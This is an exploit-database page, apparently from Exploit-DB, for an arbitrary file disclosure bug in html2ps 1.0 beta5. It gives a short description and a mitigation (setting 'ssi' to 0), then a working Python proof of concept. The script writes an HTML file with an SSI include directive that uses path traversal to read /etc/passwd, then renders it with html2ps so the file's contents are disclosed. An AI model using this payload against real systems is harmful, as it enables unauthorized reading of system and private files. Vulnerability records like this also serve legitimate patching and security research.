header-logo
Suggest Exploit
vendor:
html2ps
by:
epiphant
7.5
CVSS
HIGH
Arbitrary File Disclosure
22
CWE
Product Name: html2ps
Affected Version From: 1.0 beta5
Affected Version To: 1.0 beta5
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

html2ps <= 1.0 beta5 arbitrary file disclosure

The “include file” SSI directive of html2ps does not check for directory traversal, allowing an attacker to include and disclose any file in the directory tree. The vulnerability requires that “ssi” in the @html2ps block in the html2psrc file is set to 1, which is the default.

Mitigation:

Ensure that the “ssi” in the @html2ps block in the html2psrc file is set to 0.
Source

Exploit-DB raw data:

#!/usr/bin/env python
#
# html2ps <= 1.0 beta5 arbitrary file disclosure
# http://user.it.uu.se/~jan/html2ps.html
# author: epiphant <epiphant.0@gmail.com>
#
# the "include file" ssi directive doesn't check for directory
# traversal so you can include and disclose any file in the
# dir tree (very handy when html2ps is running as a part of a
# web app with data that you control)
# the vuln requires that "ssi" in the @html2ps block in the
# html2psrc file is set to 1, which is the default
#
# bonus info: some of the backtick operators look shady too
# but will require lots of prerequisites so they're uncool
#
# shouts: thcx labs, zybadawg333, fabiodds, str0ke
# jan k: shame on you - your perl is very ugly
#

import os

d = """\
<html>
<head>
<title>epiphant</title>
</head>
<body>
<h1>epiphant</h1>
<!--#include file="../../../../../../../etc/passwd"-->
<p>epiphant</p>
</body>
</html>
"""

try:
  fi = open("epiphant.html", "w")
  fi.write(d)
  fi.close()
except:
  print "can't write here"
  exit(1)

os.system("html2ps epiphant.html > epiphant.ps")
os.system("gv epiphant.ps")
exit(0)